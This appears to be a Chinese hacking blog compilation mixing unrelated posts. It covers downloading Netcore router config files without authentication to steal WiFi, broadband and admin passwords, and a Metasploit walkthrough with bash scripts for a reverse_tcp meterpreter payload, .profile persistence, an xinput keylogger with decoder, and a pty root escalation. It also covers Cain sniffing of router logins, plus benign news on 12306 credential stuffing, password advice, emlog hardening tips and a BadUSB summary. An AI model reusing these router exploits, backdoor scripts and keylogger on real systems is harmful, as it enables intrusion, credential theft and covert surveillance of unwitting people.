Mrxn声明：此文章只能用于学习研究，禁止用于非法用途，否则后果与本博客无关。

0X1：总体描述

磊科NW系列路由器存在不需要登录路由器就可以下载路由器配置文件param.file.tgz，通过WinHEX查看此配置文件可得到路由器配置信息，包括路由器登录用户名密码，宽带账号、密码，动态域名登录用户名密码，WiFi_ssid wifi_key等等。

注：前提是你已经破解了WiFi密码，连接上了WiFi。教程：WiFi破解教程，资源下载，自己看吧。 没有的可以自己测试一下自己的路由器

0X2：具体操作

eg：路由器的网关是192.168.1.1 ，打开IE，在地址栏输入：http://192.168.1.1，然后回车>>>>>>

是不是需要账号密码？下面就是重点：

我们点击登录窗口右上角的那个 红X (鼠标位置，给小白的，老鸟飞过吧 ^_^) ，关掉登录窗口，然后在地址栏的末尾添加上param.file.tgz，地址改变为：http://192.168.1.1/param.file.tgz 此时神器的事情就发生了哦，如下图所示：

下载保存吧。注：只能用IE自带的下载，其他的下载不好使。 

下载完后，就是读取配置文件的时候了；

0X3，用神器WinHex读取 **.file.tgz 配置文件

WinHex 绿色免安装版下载 （点击下载）

路由器登录用户名+密码;

WiFi_ssid + WiFi_key （骚年必须先破解了才能蹭网执行上面的步骤吧 O(∩_∩)O哈哈~）；

路由器的型号，固件版本通通都知道了吧。 

0X4，End

你得到了这些后可以干很多事情的的，比如cookies劫持，登录他的空间，微博，百度账号。内网嗅探，渗透deng 自由发挥吧<<<<<

也可以参看我的另一篇教程：破解了你的路由密码后，我还可以这样做，绝对不是蹭你网这么简单

好了，教程到此结束了，写教程真的很累，原创，转载请注明出处Mrxn's Blog，谢谢。

12月25日，漏洞报告平台乌云网出现了一则关于中国铁路购票网站12306的漏洞报告，危害等级显示为“高”，漏洞类型则是“用户资料大量泄漏”。据悉，此漏洞将有可能导致所有注册了12306用户的账号、明文密码、身份证、邮箱等敏感信息泄露。对此，中国铁路客户服务中心回应称，经我网站认真核查，此泄露信息全部含有用户的明文密码。我网站数据库所有用户密码均为多次加密的非明文转换码，网上泄露的用户信息系经其他网站或渠道流出。目前，公安机关已经介入调查。

当天，乌云平台继续发布消息称，12306的数据疑似黑客撞库后整理得到，而并非12306直接泄漏。那么什么是“黑客撞库”？我们一起来看看。

撞库：黑客通过收集互联网已泄露的用户+密码信息，生成对应的字典表，尝试批量登录其他网站后，得到一系列密码组合后可以登录的用户。

黑客首先会通过收集互联网已泄露的用户+密码信息，生成对应的字典表，然后再用字典中罗列的用户和密码，尝试批量登陆其他网站。如果用户图省事在多个网站设置了同样的用户名和密码，黑客很容易就会通过字典中已有的信息，登录到这些网站，从而获得用户的相关信息，如：手机号码、身份证号码、家庭住址，支付宝及网银信息等。

之前某电商网站发生的“抹黑”事件，就是黑客利用“撞库”方法，“凑巧”获取到了该电商网站用户的数据(如用户名密码)，然后通过模仿用户评论，留下了大量差评。

有安全人士分析了此次12306的用户信息泄露时间，推断基本可以定性为撞库行为。理由如下：

1、随机抽取了一批账号(约50个)均成功登录12306，证明了该批数据是准确的；
2、随机联系了该批数据中的多个qq用户，均反馈没有使用过抢票软件且近期没有购票行为；
3、经与群中人员进行交流，并未有人见过该批18G的全部数据，普遍认为该批数据为撞库所得，并不存在18G的12306全部数据。
4、安全人员搜索以往互联网上的数据进行了匹配，从17173.com、7k7k.com、uuu9.com等网站泄露流传的数据中搜索到了该批13.15万条用户数据，基本可以确认该批数据全部是通过撞库获得。”

黑客团队从地下产业链收购海量用户名及密码数据，在12306、淘宝、京东等不同网站进行撞库匹配，而大部分网民在各大互联网平台采用同一套用户名密码，这会让黑客存在可乘之机。

有安全领域人士分析称，12306此次信息泄露依然和安全体系不完善有关，如果这次撞库发生在需要二次验证登录的系统中则不可能成功。

拖库：和撞库类似，拖库也是一个黑客术语，它指的是黑客入侵有价值的网站，把注册用户的资料数据库全部盗走的行为，因为谐音，所以也常被称作“脱裤”。之前发生的某手机品牌用户信息大量泄露事件，就是拖裤行为的一个典型案例。在该事件中，用户名和密码大量泄露，黑客反过利用这些用户名和密码，登录该品牌服务器，获得了极其详细的用户资料，其中包括用户的手机号、邮箱甚至通讯录等。

洗库：在取得大量的用户数据之后，黑客会通过一系列的技术手段和黑色产业链，将有价值的用户数据变成现金以达到非法获利的目的。这一过程被称为“洗库”。比如：售卖用户账号中的虚拟货币、游戏账号、装备等变现，也就是俗称的“盗号”；对于金融类账号，比如：支付宝、网银、信用卡、股票的账号和密码等，用来进行金融犯罪和诈骗；对于一些比较特殊的用户信息如：学生、打工者、老板等，则会通过发送广告、垃圾短信、电商营销等方式变相获利；另外是将有价值的用户信息直接出售给第三方，如网店经营者和广告投放公司等。比如黑客利用此次获取的12306帐户信息做铁路购票、退票、专卖信息等。

这里再次特别提醒用户，一定提高警惕，保护自己的帐户密码安全，尽量不要在多个网站或者客户端中使用相同的用户名和密码，并且不定时更换密码。参阅《江湖险恶 如何设置安全又方便的个人密码》

 不可否认，我们的生活已经被密码层层包围：打开锁屏手机，需要输入密码；打开电脑，需要输入密码；上QQ微信聊天，需要输入密码；登录微博论坛购物网站，需要输入密码；使用银行卡支付宝等等，更要需要输入密码……每个人都有自己的一套密码，密码后面就是我们的重要信息、隐私以及财产，其重要性不言而喻，个人密码的安全性和被破译难度将直接影响到用户的数据与信息安全。因此，为自己的各个账户设置一组难以破解的密码是构筑个人信息安全最重要一步。但如果密码过于复杂，连密码主人也难以记住，是不是又有点反人类？本文就来聊聊设置密码的注意事项以及如何设置既安全又方便的个人密码。

背景知识：弱密码与强密码

弱密码：指短密码、常见密码、默认密码等以及能被穷举法通过排列组合破解的密码，这些密码因为过于简单和常见，很容易被被快速破译。常见弱密码如下，大家看看有没有懒人还在用这些白痴密码呢？
太简单的密码：admin、abc123、password、aaaa
由于文化因素常用：888888、666666
常用键盘的键排列：asdf、qwerty

强密码：长度足够长、排列随机、使用大小写字母以及数字和特殊符号组成，不容易被穷举等破解算法破译的密码。下面我们列出一些强密码的示例（注：这些密码因为公布出来为众人所知，不再算做是强密码，仅作为形式参考。）
t3wahSetyeT4 -- 不是字典的单词，既有数字也有字母
4pRte!ai@3 -- 不是字典的单词，除大小写字母、数字外还有标点
MoOoOfIn245679 -- 长，既有数字也有字母
Convert_100&pound; to Euros! -- 足够长，并且有扩展符号增加强度
Tpftcits4Utg! -- 一串随机的各种元素的混合
akd,H‰‘U‘（#t*’№&*§÷×’u -- 含键盘上没有的字符

密码设置雷区：千万不要这样做

不要设定密码为带有生日、电话号码、QQ或邮箱等与个人信息有明显联系的数据，也不要采用字典中的单词，原因很简单，这些都属于弱密码。

不要在多个场合使用同一个密码：为不同应用场合设置不同密码，特别是有关财务的网银及网购账户，避免一个帐户密码被盗，其它帐户密码也被轻易破解。

不要长期使用固定密码：定期或者不定期修改密码，安全更有保障。

不要将密码设置得过短：密码越长，破解的时间也越长。如果不想让黑客在24小时内能破解你的密码，密码长度应该超过14个字符。

密码设置技巧：先设置基础密码，然后用统一规则叠加组合成不同强密码

首先选取一个基础密码，然后根据不同的应用场合，再按照自己设置的简单规则叠加组合一些其他元素。

基础密码+网站名称的前两辅音字母+网站名称的前两个元音字母：比如基础密码是“yesky”，那么要登录Yahoo时密码就是yeskyYHAO，登陆eBay时就是yeskyBYEA。

自己喜欢的单词＋喜欢的数字排列＋网站名称的前三个字母或者后三个字母。这样，淘宝（Taobao)登录密码可以是Flower100TAO或者是Gold520Bao。

选定基础密码之后，键入时将手指在键盘上向某一个方向偏移一些位置。比如基础密码是“cat“，我们输入时将手指向左上方偏移一个键位，就变成了”dq5“。

注意：好的密码长度应该超过8个字符，同时包含大写字母、小写字母、数字以及特殊字符。

下面提供一些选择基础密码的小技巧供大家参考：

某句短语或是某首歌曲副歌的首字母。比如你很喜欢The Jackson 5的那首成名曲 I Want You Back，就可以用“IWUB”。或者PPtt13Mod，DKstFre1st对应的“娉娉婷婷十三余，豆蔻梢头二月初”。

用键盘上比较靠近的按键组合，比如说“yui”或是“zxcv”。

用自己家人或者朋友名字的首字母以及特殊的纪念日，比如“TFB0602”。

其他密码设置怪招

胡乱敲击键盘：对于敏感账户，有专家建议随机乱敲键盘，并间或敲击Shift键，然后将结果复制到一个文本，存入一个有密码保护的U盘。

安全问题答非所问：网站的验证问题经常问道“你最喜欢什么食物？”“你毕业于什么学校？”，这些问题的答案局限性太大，很容易搜索出答案。比较安全的做法是密码提示和问题无关。比如安全问题是“你喜欢什么歌曲？”，你的回答可以是你宠物店名字等等。

密码生成器：如果还是不想自己设置，网络上有很多在线密码生成器，可以根据一些算法，根据基础密码和网站地址来生成不同的密码。不过如何保存这些密码，也是需要注意的问题。现在有一些个人资料管理工具如Keepass、LastPass、1Password等，可以集中将个人数据、加密密码进行保存，并且通过基于图像或个人手势的方式进行解锁。

现在很多网站也设置了双重认证等机制，增加额外密码安全保护，并且要求验证两个独立的方式，通常情况下是密码和短信验证码的组合。结合上面介绍的一些方法和技巧，希望大家的“密码生活”更加轻松安全。

最近几年除了wordpress与Zblog被站长青睐外，还有很多站长也采用emlog建立自己的站。我是一个个人站长，也不例外，用其建立了自己的站，用过一段后发现总体很好，简单、方面、SEO效果能力非常出众、模板众多。但毕竟一个开源的程序出来后就会被爆出各种漏洞，默认的设置对网站是一个危险的信号。所以今天根据最近自己的几点经验，来和大家总结下emlog在安全和建站两个方面需要注意的几个问题，如果大家有更多的心得，欢迎写成文章来分享。

首先是安全上需要注意的事项：

1、修改安全度高的密码：给网站设置一个安全程度比较高的密码，最好大小写混合加特殊符号，但是很多站长提问不知道在哪里修改密码，这里告诉大家，登陆后台之后，在设置--个人资料--就能看到。

2、修改后台默认登陆目录：后台默认的登陆目录如果是admin，那么相对就有点危险，最好还是修改一下，修改牵涉的文件分别是admin/globals.php、include/lib/view.php、t/index.php、templates/default/module.php、templates/default/header.php、templates/default/t.php，从这几个文件中搜索admin并替换为你想要的目录就可以了。这也是在安全上非常有必要的一步。

3、文件夹写入权限：如果使用的是服务器或者是VPS，那么直接登陆上去把根目录中的content文件夹修改为USER具有修改和写入权限就可以了，其它的尽量都压低权限。如果你把整个文件夹的写入修改权限都放开，那么就相当危险。

接着是SEO上的几点建议：

1、ico图片问题：如果大家做的是盈利性网站，比如淘宝客，那么建议大家都复制一个favicon.ico图标放入根目录，这样感觉更加真实，更加让用户容易产生信任感，如果是非营利性的网站或者博客，那么添加这个ICO小图标可以让网站更具有唯一性，更容易被用户记忆。

2、挑选模板事项：模板是SEO优化中不得不提的一个重点，尽量挑选简便的、图片少的，这样就更能够突出文字，在预览中，需要查看源代码，如果首页的标题在代码比较靠下的位置，那么这个模板在SEO的角度来说并不算一个合格的模板。尽量挑选正文内容靠左的模板。

3、关键词的布置：在模板文件夹的head文件中，添加meat base属性，属性的值就用域名或者品牌名，网站导航中不要使用关键词进行布局；页脚的版权中建议保留版权，但是可以再另外添加自己的版权，侧面的自由定制区域也可以添加我们自己的内容，但是这些内容最好包含关键词。

4、给rss订阅、登陆、管理、联系我们等链接加上nofollow属性，这写是在网站的头文件中包含，几乎每个页面都会存在，所以会浪费权重的传递，屏蔽之后权重会更加集中。

好了，今天的总结暂时就到这里。Mrxn在以后使用中总结更多的相关经验，并及时和大家分享。如果你也打算建立自己的网站或者博客，那么不妨先看看这篇文章，希望对你有帮助。欢迎转载，转载请保留链接，谢谢~

这篇文章写来主要是一次娱乐性的练习。共享出攻击的细节，其中包括一些经过原作者修改过的各种来源的脚本文件。渗透的过程不是重点，之所以发出来最大的原因主要是文章后半部分维持持久化攻击的一些地方还是很值得学习的，顺便大家也可以再次熟悉一下MSF框架。希望对大家有所帮助。

攻击环境：

Ubuntu12.04LTS 32bit（靶机，默认的软件安装配置）
VirtualBox
Metasploit framework（最新版）
Debian Squeeze 64bit （攻击机）

首先，我们先准备一个简单的二进制ELF可执行文件生成器的bash脚本，这样后续工作就可以轻松很多。然后将脚本放在Metasploit的主目录下：

#!/bin/bash clear
echo"************************************************" echo " LINUX ELF BINARY GENERATOR FOR METASPLOIT    *" echo"************************************************" echo -e "What IP are we gonna use  ex. 192.168.0.1?  \c" read IP
echo -e "What Port Number are we gonnalisten to? : \c" read port ./msfpayloadlinux/x86/meterpreter/reverse_tcp LHOST=$IP LPORT=$port R| ./msfencode -t elf-e x86/shikata_ga_nai >> Executive echo "Executive binarygenerated.." chmod u=rwx Executive ls -la Executive

运行脚本之后进行简单的配置之后我们就有了一个名为Executive的二进制可执行文件。

接下来需要我们在攻击机上启动一个监听来等待靶机主动连上来，因为我们这里使用了全球流行的reverse后门哇咔咔！为了工作更加简（zhuang）单（bi），我这里又写了一个bash，然后将bash文件也放在Metasploit的主目录下面：

#!/bin/bash clear
echo"*********************************************" echo "   METASPLOIT LINUX METERPRETER LISTENER    *" echo"*********************************************" echo "Here is a network device listavailable on yor machine" cat /proc/net/dev | tr -s  ' ' | cut -d ' ' -f1,2 | sed -e '1,2d' echo -e "What network interface are wegonna use ?  \c" read interface
echo -e "What Port Number are we gonnalisten to? : \c" read port # Get OS name OS=`uname` IO="" # store IP case $OS in   Linux) IP=`/sbin/ifconfig $interface | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print$1}'`;;    *)IP="Unknown";; esac echo "      starting the meterpreter listener.." ./msfcli exploit/multi/handler  PAYLOAD=linux/x86/meterpreter/reverse_tcp  LHOST=$IP LPORT=$port  E

好了，监听生成结束，然后就需要我们使用各种猥琐的方式将后门木马转给Ubuntu靶机执行。因为这里是练习，所以我们直接将ELF文件放在受害机中执行                         此处有图胜有声

现在我们就已经在靶机上成功执行了这个“未知”的二进制文件。当我们双击这个文件时没有任何反应（所以这个时候后门注入才是王道），不过我们的攻击机上的监听已经有了结果：

然后呢？我们现在有了一个meterpreter shell，不过应该怎样获取到root权限呢？接下来的工作才是最有趣的部分：接下来，我们将在靶机的home中放一个后门文件，并通过修改.profile文件做到每次靶机启动的时候都会执行我们的后门。为了做到这步，我们首先需要下载靶机的.profile文件：

我们在文件中加了一点点内容以保证每次登录都能成功执行我们的后门文件，这里加的是./executive（用的就是生成的后门文件名，这里我们可以起一些诱惑性大的名字比如sys.conf之类的，但是要保证文件具有可执行+x权限）

然后我们将修改后的.profile文件传回靶机

接着我们上传我们的ELF二进制可执行文件到靶机的home目录里面，并改名为executive同时要保证文件具有RWX属性

那么现在我们就获得了一个简单的持久性后门，每次靶机开机我们这边就可以获得一个上线shell，并且文件时静默执行不含任何防腐剂的。

好的，第一步持久化我们已经完成了，接下来我们做点什么呢？

键盘记录

Ubuntu自带xinput所以我们可以利用这个做一个键盘记录keylogger记录靶机在X界面下的一些按键输入。同时这里作者又写了一bash脚本（……）：

#!/bin/bash export DISPLAY=:0.0 xinput list
echo -e "KBD ID ?" read kbd
xmodmap -pke > /tmp/.xkey.log
script -c "xinput test $kbd" |cat >> /tmp/.xkey.log & echo "The keylog can be downloadedfrom /tmp/.xkey.log" echo "Use the meterpreter downloadfunction" echo "Press CTLR+C to exit thissession, keylogger will run in backround"

写完之后我们将脚本放在靶机中然后执行。当然最好也来个登录启动。

启动之后我们还需要手工找到键盘的KBD ID，然后输入，这里是10

然后让脚本去识别一下。脚本记录的log文件默认是放在/tmp文件夹下的，一段时间之后，我们下载下来分析一下。

这个脚本的生成的内容地球人是看不懂的，所以我们将log文件down下来之后还需要进行接下来的处理，这里作者写了一个bash文件生成了一个python脚本来解码这段天书log（…），下面是解码的bash脚本：

#!/bin/sh cat .xkey.log | grep keycode >xmodmap.pke
cat .xkey.log | grep 'key p' > xlog
rm -f .xkey.log #Generating some Python to do the decoding echo 'import re, collections, sys' >decoder.py
echo 'from subprocess import *' >>decoder.py
echo 'def keyMap():' >> decoder.py
echo '  table = open("xmodmap.pke")' >> decoder.py
echo '  key = []' >> decoder.py
echo '  for line in table:' >> decoder.py
echo "      m = re.match('keycoded+) = (.+)',line.decode())" >> decoder.py
echo '     if m and m.groups()[1]:' >> decoder.py
echo '        key.append(m.groups()[1].split()[0]+"_____"+m.groups()[0])'>> decoder.py
echo '  return key' >> decoder.py
echo 'def printV(letter):' >>decoder.py
echo '     key=keyMap();' >> decoder.py
echo '     for i in key:' >> decoder.py
echo '              if str(letter) ==i.split("_____")[1]:' >> decoder.py
echo '                     return i.split("_____")[0]'>> decoder.py
echo '     return letter' >> decoder.py
echo 'if len(sys.argv) < 2:' >>decoder.py
echo '        print "Usage: %s FILE" %sys.argv[0];' >> decoder.py
echo '        exit();' >> decoder.py
echo 'else:' >> decoder.py
echo '        f = open(sys.argv[1])' >>decoder.py
echo '        lines = f.readlines()' >>decoder.py
echo '        f.close()' >> decoder.py
echo '        for line in lines:' >> decoder.py
echo "                m = re.match('keyss +(\d+)',line)" >> decoder.py
echo '                if m:' >> decoder.py
echo '                          keycode =m.groups()[0]' >> decoder.py
echo '                          print(printV(keycode))' >> decoder.py
 
echo 'Please see LOG-keylogger for theoutput......' python decoder.py xlog > LOG
sed ':a;N;$!ba;s/\n/ /g' LOG >LOG-keylogger
rm -f LOG
rm -f xmodmap.pke
rm -f decoder.py
rm -f xlog
cat LOG-keylogger

现在我们运行一下这个bash脚本，我们就可以看到效果了：

好，keylogger也搞完了接下来就是怎么样获取到root权限了。

获取root权限

在这里，我们从以上的keylogger中获取到了root密码，但是当我们直接输入sudo su获取root的时候却遇到了无法返回响应的情况：

这里有一个绕过的好方法，就是利用自带的python来获取一个交互式的shell从而可以让我们获取root权限

python -c “import pty;pty.spawn(‘/bin/bash’)”

这样我们sudo su的时候就可以输入root密码了，然后成功获取到了一个root级别的shell，整个过程就完满完成了。

后记

CentOS, Debian Squeeze等有些系统默认是不带xinput的所以keylogger的部分就没办法完成了。

另外，要想防止这个键盘记录其实也很简单，只要去掉xinput的可执行权限就可以了

chmod a-x /path/to/xinput

当然，即便是目标机器上没有自带xinput那难道就会难倒我们么？拜托我们都已经有了meterpreter shell了好么。

最后附上作者做的良心的视频Demo（已搬回墙内，不谢！）：

百度网盘下载/观看：

链接:  http://pan.baidu.com/s/1eQIkbQy    提取码:  m37p

mrxn.net----翻译分享----安全专家卡斯滕Nohl和Jakob Lell演示了如何重新编程和使用任何USB设备感染计算机用户不知情的情况下。

在的黑帽安全会议上发表讲话,并在随后英国广播公司(BBC)采访时,两人有了问题对未来的USB设备的安全。

作为演示的一部分,一个正常的智能手机连接一台笔记本电脑,也许一个朋友或同事可能会问你做的事情,这样他们就可以充电设备。但智能手机修改网卡和不是一个USB媒体设备。结果是,手机上的恶意软件能够从合法网站流量重定向到影子服务器,假的和真正的网站的外观和感觉,但实际上是设计只是为了偷登录凭证。

根据一项博客条目发布的这一对,USB的多才多艺也是它的弱点。“因为不同设备类可以插进连接器相同,一种类型的设备可以变成一个更有能力或恶意的类型没有用户注意,”研究人员写道。

那些对安全研究实验室工作的专家,在德国,在黑帽会议上了“BadUSB——把邪恶的配件。“每一个USB设备有一个微控制器,对用户不可见。它负责与主机设备(如个人电脑)和与实际的硬件。这些微控制器的固件是不同的在每一个USB设备,每个设备上的微控制器软件是不同的。网络摄像头、键盘、网络接口、智能手机和闪存所有执行不同的任务和相应的软件开发。

然而,团队管理的反向工程,不同设备的固件在不到两个月。因此他们可以re-program设备和让他们充当他们没有的东西。

在黑帽,一个标准的USB驱动器是插入到计算机。恶意代码植入棍骗电脑思考一个键盘被插入。假键盘开始键入命令,迫使计算机从互联网下载恶意软件。

防御这种类型的攻击包括微控制器固件更新的策略如代码签名或固件的禁用硬件的变化。然而,这些都必须实现的USB设备制造和不是最终用户可以执行。

你可以在这里下载幻灯片的演示:https://srlabs.de/blog/wp-content/uploads/2014/07/SRLabs-BadUSB-BlackHat-v1.pdf 

      使用cain嗅探路由器登录密码网上有教程，但是不够详细，希望这篇文章能帮助一些不懂的童鞋少走弯路。

还是那句话，建议不要安装汉化版的，会出现错误，某个程序不能启动。

     首先安装WinPcap  

     然后安装Cain

    前面的步骤，省略，都是直接点击下一步的。。。。。

    启动后杀毒软件会报木马，介意的童鞋勿用

    监听到无线路由密码

    还有一点要提醒不懂的童鞋这款工具监听的是无线路由器的登录密码而不是连接密码，大家不要混淆了。前提要先PJ连接密码。连接上路由，就是可以上网的情况下。

此工具适合有耐心的童鞋，也不单只用于监听路由登录密码。通过监听可以知道目标在浏览的网站、QQ等等。至于还有什么大家发挥自己天马行空的想象吧！（看下图）

    更多的技术，欢迎大家去发现并讨论交流。